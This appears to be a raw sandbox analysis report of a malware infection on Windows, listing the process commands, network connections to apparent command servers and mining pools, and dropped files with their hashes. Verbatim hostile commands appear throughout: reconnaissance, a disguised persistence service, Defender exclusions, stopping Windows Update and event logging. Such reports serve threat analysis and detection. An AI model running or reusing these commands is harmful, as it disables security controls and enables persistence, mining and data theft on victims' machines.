C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 1184
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3636 -ip 3636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 1208
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "chcp"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "chcp"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 3636 -ip 3636
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Get-Clipboard
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\chcp.com
chcp
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 1200
C:\Windows\system32\chcp.com
chcp
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3636 -ip 3636
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 1320
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 3636 -ip 3636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 1476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3636 -ip 3636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 1552
C:\Users\Admin\AppData\Local\Temp\1000075001\legs.exe
"C:\Users\Admin\AppData\Local\Temp\1000075001\legs.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1876 -ip 1876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1876 -s 272
C:\Windows\system32\HOSTNAME.EXE
hostname
C:\Windows\System32\Wbem\WMIC.exe
wmic logicaldisk get caption,description,providername
C:\Windows\system32\net.exe
net user
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user
C:\Windows\system32\query.exe
query user
C:\Windows\system32\quser.exe
"C:\Windows\system32\quser.exe"
C:\Users\Admin\AppData\Local\Temp\e221f72865\Dctooux.exe
C:\Users\Admin\AppData\Local\Temp\e221f72865\Dctooux.exe
C:\Windows\system32\net.exe
net localgroup
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "create" "winsvc" "type=own" "start=auto" "error=ignore" "binPath=\"C:\Windows\system32\winsvc.exe\"" "DisplayName=\"Windows System Service\""
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Windows\system32\net.exe
net localgroup administrators
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators
C:\Windows\system32\net.exe
net user guest
C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" create winsvc type=own start=auto error=ignore binPath=C:\Windows\system32\winsvc.exe "DisplayName=Windows System Service"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user guest
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2668 -ip 2668
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2668 -s 480
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "failure" "winsvc" "reset=0" "actions=restart/0/restart/0/restart/0"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" failure winsvc reset=0 actions=restart/0/restart/0/restart/0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "description" "winsvc" "\"Windows System Service is the main system supervision service.\""
C:\Windows\system32\net.exe
net user administrator
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user administrator
C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" description winsvc "Windows System Service is the main system supervision service."
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "start" "winsvc"
C:\Windows\System32\Wbem\WMIC.exe
wmic startup get caption,command
C:\Windows\system32\tasklist.exe
tasklist /svc
C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" start winsvc
C:\Windows\system32\winsvc.exe
C:\Windows\system32\winsvc.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "WSNKISKT"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "WSNKISKT"
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\ipconfig.exe
ipconfig /all
C:\Windows\system32\ROUTE.EXE
route print
C:\Windows\system32\ARP.EXE
arp -a
C:\Windows\system32\NETSTAT.EXE
netstat -ano
C:\Windows\system32\sc.exe
sc query type= service state= all
C:\Windows\system32\netsh.exe
netsh firewall show state
C:\Windows\system32\netsh.exe
netsh firewall show config
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "Add-MpPreference" "-ExclusionPath" "\"C:\Windows\system32\""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "Add-MpPreference" "-ExclusionPath" "\"C:\Windows\Temp\""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-SETACTIVE" "8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c"
C:\Windows\system32\powercfg.exe
"C:\Windows\system32\powercfg.exe" -SETACTIVE 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "standby-timeout-ac" "0"
C:\Windows\system32\powercfg.exe
"C:\Windows\system32\powercfg.exe" -change standby-timeout-ac 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "standby-timeout-dc" "0"
C:\Windows\system32\powercfg.exe
"C:\Windows\system32\powercfg.exe" -change standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "hibernate-timeout-ac" "0"
C:\Users\Admin\AppData\Local\Temp\e221f72865\Dctooux.exe
C:\Users\Admin\AppData\Local\Temp\e221f72865\Dctooux.exe
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Windows\system32\powercfg.exe
"C:\Windows\system32\powercfg.exe" -change hibernate-timeout-ac 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "hibernate-timeout-dc" "0"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3844 -ip 3844
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 472
C:\Windows\system32\powercfg.exe
"C:\Windows\system32\powercfg.exe" -change hibernate-timeout-dc 0
C:\Windows\system32\taskkill.exe
"taskkill.exe" "/F" "/IM" "winnet.exe"
C:\Windows\system32\taskkill.exe
"taskkill.exe" "/F" "/IM" "winnet.exe"
C:\Windows\system32\taskkill.exe
"taskkill.exe" "/F" "/IM" "wincfg.exe"
C:\Windows\system32\taskkill.exe
"taskkill.exe" "/F" "/IM" "wincfg.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "Remove-NetFirewallRule" "-DisplayName" "\"Windows Network Manager\""
Network
| Country | Destination | Domain | Proto |
| RU | 147.45.47.155:80 | 147.45.47.155 | tcp |
| DE | 77.91.77.81:80 | 77.91.77.81 | tcp |
| US | 8.8.8.8:53 | 155.47.45.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| DE | 77.91.77.81:80 | 77.91.77.81 | tcp |
| GB | 172.217.169.78:443 | www.youtube.com | tcp |
| NL | 142.250.27.84:443 | accounts.google.com | tcp |
| NL | 142.250.27.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | 84.27.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.187.250.142.in-addr.arpa | udp |
| GB | 142.250.187.238:443 | accounts.youtube.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.206:443 | clients2.google.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| RU | 185.215.113.67:40960 | tcp | |
| N/A | 127.0.0.1:49999 | tcp | |
| DE | 185.172.128.33:8970 | tcp | |
| US | 104.21.44.95:443 | boredombusters.online | tcp |
| DE | 4.185.27.237:13528 | tcp | |
| N/A | 127.0.0.1:50014 | tcp | |
| N/A | 127.0.0.1:50017 | tcp | |
| N/A | 127.0.0.1:50019 | tcp | |
| US | 188.114.96.2:443 | parallelmercywksoffw.shop | tcp |
| US | 104.21.63.189:443 | liabiliytshareodlkv.shop | tcp |
| US | 172.67.160.81:443 | notoriousdcellkw.shop | tcp |
| US | 104.21.59.152:443 | conferencefreckewl.shop | tcp |
| US | 172.67.197.45:443 | flourhishdiscovrw.shop | tcp |
| US | 172.67.128.71:443 | landdumpycolorwskfw.shop | tcp |
| US | 172.67.197.178:443 | barebrilliancedkoso.shop | tcp |
| DE | 185.172.128.116:80 | 185.172.128.116 | tcp |
| US | 104.21.91.177:443 | willingyhollowsk.shop | tcp |
| US | 104.21.75.100:443 | distincttangyflippan.shop | tcp |
| US | 104.21.1.23:443 | macabrecondfucews.shop | tcp |
| US | 172.67.173.64:443 | greentastellesqwm.shop | tcp |
| US | 172.67.198.233:443 | stickyyummyskiwffe.shop | tcp |
| US | 104.21.52.210:443 | sturdyregularrmsnhw.shop | tcp |
| US | 104.21.10.78:443 | lamentablegapingkwaq.shop | tcp |
| US | 104.21.79.21:443 | innerverdanytiresw.shop | tcp |
| US | 104.21.9.31:443 | standingcomperewhitwo.shop | tcp |
| DE | 185.172.128.116:80 | 185.172.128.116 | tcp |
| DE | 185.172.128.19:80 | 185.172.128.19 | tcp |
| RU | 5.42.65.67:48396 | tcp | |
| RU | 5.42.65.67:48396 | tcp | |
| RU | 5.42.65.67:48396 | tcp | |
| NL | 91.92.240.234:80 | o7labs.top | tcp |
| RU | 5.42.65.67:48396 | tcp | |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| RU | 5.42.65.67:48396 | tcp | |
| N/A | 127.0.0.1:50463 | tcp | |
| BG | 130.204.29.121:80 | jkshb.su | tcp |
| BG | 130.204.29.121:80 | jkshb.su | tcp |
| BG | 130.204.29.121:80 | jkshb.su | tcp |
| N/A | 127.0.0.1:50510 | tcp | |
| N/A | 127.0.0.1:50512 | tcp | |
| N/A | 127.0.0.1:50514 | tcp | |
| RU | 5.42.65.67:48396 | tcp | |
| RU | 5.42.65.67:48396 | tcp | |
| RU | 5.42.65.67:48396 | tcp | |
| RU | 5.42.65.67:48396 | tcp | |
| RU | 5.42.65.67:48396 | tcp | |
| FR | 51.210.150.92:10943 | zeph-eu2.nanopool.org | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| FR | 146.59.154.106:14433 | xmr-eu1.nanopool.org | tcp |
| RU | 5.42.65.67:48396 | tcp | |
| RU | 5.42.65.67:48396 | tcp | |
| RU | 5.42.65.67:48396 | tcp | |
| RU | 5.42.65.67:48396 | tcp | |
| RU | 5.42.65.67:48396 | tcp | |
| RU | 5.42.65.67:48396 | tcp | |
| RU | 5.42.65.67:48396 | tcp | |
| RU | 5.42.65.67:48396 | tcp | |
| RU | 5.42.65.67:48396 | tcp | |
| RU | 5.42.65.67:48396 | tcp | |
| RU | 5.42.65.67:48396 | tcp | |
| RU | 5.42.65.67:48396 | tcp | |
| RU | 5.42.65.67:48396 | tcp |
Files
memory/4904-0-0x0000000000B10000-0x0000000000FCA000-memory.dmp
memory/4904-1-0x0000000077DE6000-0x0000000077DE8000-memory.dmp
memory/4904-2-0x0000000000B11000-0x0000000000B3F000-memory.dmp
memory/4904-3-0x0000000000B10000-0x0000000000FCA000-memory.dmp
memory/4904-5-0x0000000000B10000-0x0000000000FCA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
| MD5 | df4f6e4b9dd45826d34a405743f47f4b |
| SHA1 | a66e83e8199bbbbb5363c79c173fe97659121c01 |
| SHA256 | d6105747d3d97f0202125567f82b2e04ae696dd101582fc288d69800abdf32eb |
| SHA512 | 3a6d690b7a5604ce28cac82c4fc35883c5506a7b681332517d9cd4315f5dc203155233802ff5f544afe677b1ad2a3650a077a4019947c4c0cc81dd70424cd65c |
memory/2752-18-0x0000000000350000-0x000000000080A000-memory.dmp
memory/4904-17-0x0000000000B10000-0x0000000000FCA000-memory.dmp
memory/2752-19-0x0000000000351000-0x000000000037F000-memory.dmp
memory/2752-20-0x0000000000350000-0x000000000080A000-memory.dmp
memory/2752-21-0x0000000000350000-0x000000000080A000-memory.dmp
C:\Users\Admin\1000015002\cf2c0e9ce8.exe
| MD5 | b84c9932a2222efd9ca45f4d96c20cd0 |
| SHA1 | 86eb1360eb375d313904397d7279f666ed37934c |
| SHA256 | 3f057d41729ede50420ed52323bf31988be3d8621186c9f3aa769addb2f89fdd |
| SHA512 | d2f16fdafba9a80d68945f586c6b21ab3aece69dfad4642e376af4930a9c0498e7c268ff0117cd2f67e035b9d470c5dafcdd6b56c6f95e3e97db6ece8afd8a7e |
memory/2704-39-0x00000000004C0000-0x000000000097F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000016001\f2e8263483.exe
| MD5 | cae8c3bede3a379791e8df604b3810be |
| SHA1 | 2f7df28aaeec2c4d726d6518ec10fe3a4b7f94a1 |
| SHA256 | 181962a1cb159f4233780fdaee11d9455de50168783b518e773a03e8a6cc4b1e |
| SHA512 | cb584bff64ff74024b9173b7bd1f89c525ffc60bd2cd205b0a6807be270013db3b1d29439e6d95c39e285c3d3f70f04a6e80e54ea8adf362afa3d8d58ce88a02 |
memory/1528-64-0x0000000000930000-0x0000000000E62000-memory.dmp
memory/1528-58-0x0000000000930000-0x0000000000E62000-memory.dmp
memory/3436-70-0x0000000000B10000-0x0000000000FCF000-memory.dmp
memory/2704-69-0x00000000004C0000-0x000000000097F000-memory.dmp
memory/1940-73-0x0000000000B10000-0x0000000000FCF000-memory.dmp
memory/4588-75-0x0000000000350000-0x000000000080A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000017001\80a7b281bf.exe
| MD5 | 011ebbcd0f564355a0c87789d1994d2f |
| SHA1 | 9df3452956203bcd202f8296a4aab17a7a25b479 |
| SHA256 | d713d26138293c3ea6bda1ac57babfdd2e2d01ff96114fc65680f0664558d206 |
| SHA512 | 8728b1db66a03981c31641fc5a44facd468eb20c148b81c92d7789c20d7c679810208316d26511a1edb0caa5b97f1d03787594c77a6d6c1d4d9b7fea2d570333 |
memory/1940-96-0x0000000000B10000-0x0000000000FCF000-memory.dmp
memory/4588-99-0x0000000000350000-0x000000000080A000-memory.dmp
\??\pipe\crashpad_3648_DOOGDDHKWPJQXXKQ
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
memory/2752-144-0x0000000000350000-0x000000000080A000-memory.dmp
memory/2752-145-0x0000000000350000-0x000000000080A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000005001\judit.exe
| MD5 | c09ff1273b09cb1f9c7698ed147bf22e |
| SHA1 | 5634aec5671c4fd565694aa12cd3bf11758675d2 |
| SHA256 | bf8ce6bb537881386facfe6c1f9003812b985cbc4b9e9addd39e102449868d92 |
| SHA512 | e8f19b432dc3be9a6138d6a2f79521599087466d1c55a49d73600c876508ab307a6e65694e0effb5b705fdecdd0e201f588c8d5c3767fe9ae0b8581c318cadac |
memory/2752-163-0x0000000000350000-0x000000000080A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\onefile_1596_133631872895951778\stub.exe
| MD5 | 972d9d2422f1a71bed840709024302f8 |
| SHA1 | e52170710e3c413ae3cfa45fcdecf19db4aa382c |
| SHA256 | 1c666df4eafab03ecde809ffbc40dd60b8ac2fe7bdca5632c5c4002254e6e564 |
| SHA512 | 3d84252756dcb4820b7794e9a92811d32631b9f3e9bd1a558fd040736b1472c0d00efb6ff7a13ae3bcd327f3bfac2b6ad94a5a3dfbc8ba54511a366c4f4727a6 |
C:\Users\Admin\AppData\Local\Temp\onefile_1596_133631872895951778\python310.dll
| MD5 | c80b5cb43e5fe7948c3562c1fff1254e |
| SHA1 | f73cb1fb9445c96ecd56b984a1822e502e71ab9d |
| SHA256 | 058925e4bbfcb460a3c00ec824b8390583baef0c780a7c7ff01d43d9eec45f20 |
| SHA512 | faa97a9d5d2a0bf78123f19f8657c24921b907268938c26f79e1df6d667f7bee564259a3a11022e8629996406cda9fa00434bb2b1de3e10b9bddc59708dbad81 |
C:\Users\Admin\AppData\Local\Temp\onefile_1596_133631872895951778\VCRUNTIME140.dll
| MD5 | f12681a472b9dd04a812e16096514974 |
| SHA1 | 6fd102eb3e0b0e6eef08118d71f28702d1a9067c |
| SHA256 | d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8 |
| SHA512 | 7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2 |
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_ctypes.pyd
| MD5 | 87596db63925dbfe4d5f0f36394d7ab0 |
| SHA1 | ad1dd48bbc078fe0a2354c28cb33f92a7e64907e |
| SHA256 | 92d7954d9099762d81c1ae2836c11b6ba58c1883fde8eeefe387cc93f2f6afb4 |
| SHA512 | e6d63e6fe1c3bd79f1e39cb09b6f56589f0ee80fd4f4638002fe026752bfa65457982adbef13150fa2f36e68771262d9378971023e07a75d710026ed37e83d7b |
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libffi-7.dll
| MD5 | eef7981412be8ea459064d3090f4b3aa |
| SHA1 | c60da4830ce27afc234b3c3014c583f7f0a5a925 |
| SHA256 | f60dd9f2fcbd495674dfc1555effb710eb081fc7d4cae5fa58c438ab50405081 |
| SHA512 | dc9ff4202f74a13ca9949a123dff4c0223da969f49e9348feaf93da4470f7be82cfa1d392566eaaa836d77dde7193fed15a8395509f72a0e9f97c66c0a096016 |
C:\Users\Admin\AppData\Local\Temp\onefile_1596_133631872895951778\_lzma.pyd
| MD5 | b5fbc034ad7c70a2ad1eb34d08b36cf8 |
| SHA1 | 4efe3f21be36095673d949cceac928e11522b29c |
| SHA256 | 80a6ebe46f43ffa93bbdbfc83e67d6f44a44055de1439b06e4dd2983cb243df6 |
| SHA512 | e7185da748502b645030c96d3345d75814ba5fd95a997c2d1c923d981c44d5b90db64faf77ddbbdc805769af1bec37daf0ecee0930a248b67a1c2d92b59c250c |
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\sqlite3.dll
| MD5 | 926dc90bd9faf4efe1700564aa2a1700 |
| SHA1 | 763e5af4be07444395c2ab11550c70ee59284e6d |
| SHA256 | 50825ea8b431d86ec228d9fa6b643e2c70044c709f5d9471d779be63ff18bcd0 |
| SHA512 | a8703ff97243aa3bc877f71c0514b47677b48834a0f2fee54e203c0889a79ce37c648243dbfe2ee9e1573b3ca4d49c334e9bfe62541653125861a5398e2fe556 |
C:\Users\Admin\AppData\Local\Temp\onefile_1596_133631872895951778\_sqlite3.pyd
| MD5 | 7f61eacbbba2ecf6bf4acf498fa52ce1 |
| SHA1 | 3174913f971d031929c310b5e51872597d613606 |
| SHA256 | 85de6d0b08b5cc1f2c3225c07338c76e1cab43b4de66619824f7b06cb2284c9e |
| SHA512 | a5f6f830c7a5fadc3349b42db0f3da1fddb160d7e488ea175bf9be4732a18e277d2978720c0e294107526561a7011fadab992c555d93e77d4411528e7c4e695a |
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_cffi_backend.pyd
| MD5 | ebb660902937073ec9695ce08900b13d |
| SHA1 | 881537acead160e63fe6ba8f2316a2fbbb5cb311 |
| SHA256 | 52e5a0c3ca9b0d4fc67243bd8492f5c305ff1653e8d956a2a3d9d36af0a3e4fd |
| SHA512 | 19d5000ef6e473d2f533603afe8d50891f81422c59ae03bead580412ec756723dc3379310e20cd0c39e9683ce7c5204791012e1b6b73996ea5cb59e8d371de24 |
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libcrypto-1_1.dll
| MD5 | ab01c808bed8164133e5279595437d3d |
| SHA1 | 0f512756a8db22576ec2e20cf0cafec7786fb12b |
| SHA256 | 9c0a0a11629cced6a064932e95a0158ee936739d75a56338702fed97cb0bad55 |
| SHA512 | 4043cda02f6950abdc47413cfd8a0ba5c462f16bcd4f339f9f5a690823f4d0916478cab5cae81a3d5b03a8a196e17a716b06afee3f92dec3102e3bbc674774f2 |
C:\Users\Admin\AppData\Local\Temp\onefile_1596_133631872895951778\_asyncio.pyd
| MD5 | 6eb3c9fc8c216cea8981b12fd41fbdcd |
| SHA1 | 5f3787051f20514bb9e34f9d537d78c06e7a43e6 |
| SHA256 | 3b0661ef2264d6566368b677c732ba062ac4688ef40c22476992a0f9536b0010 |
| SHA512 | 2027707824d0948673443dd54b4f45bc44680c05c3c4a193c7c1803a1030124ad6c8fbe685cc7aaf15668d90c4cd9bfb93de51ea8db4af5abe742c1ef2dcd08b |
C:\Users\Admin\AppData\Local\Temp\1000007001\redline123123.exe
| MD5 | 0efd5136528869a8ea1a37c5059d706e |
| SHA1 | 3593bec29dbfd333a5a3a4ad2485a94982bbf713 |
| SHA256 | 7c21c1f3063ba963818542036a50f62ac7494ad422e7088897b55c61306ec74e |
| SHA512 | 4ac391812634107e4a4318c454a19e7c34abfc1f97acc9bcd0fac9a92c372e5ebfe809e5c433479142537762ed633564bc690b38fc268b169498d6a54249e3fe |
memory/1392-267-0x0000000000390000-0x00000000003E0000-memory.dmp
memory/1392-301-0x0000000005400000-0x00000000059A6000-memory.dmp
memory/1392-302-0x0000000004EF0000-0x0000000004F82000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_overlapped.pyd
| MD5 | 7e6bd435c918e7c34336c7434404eedf |
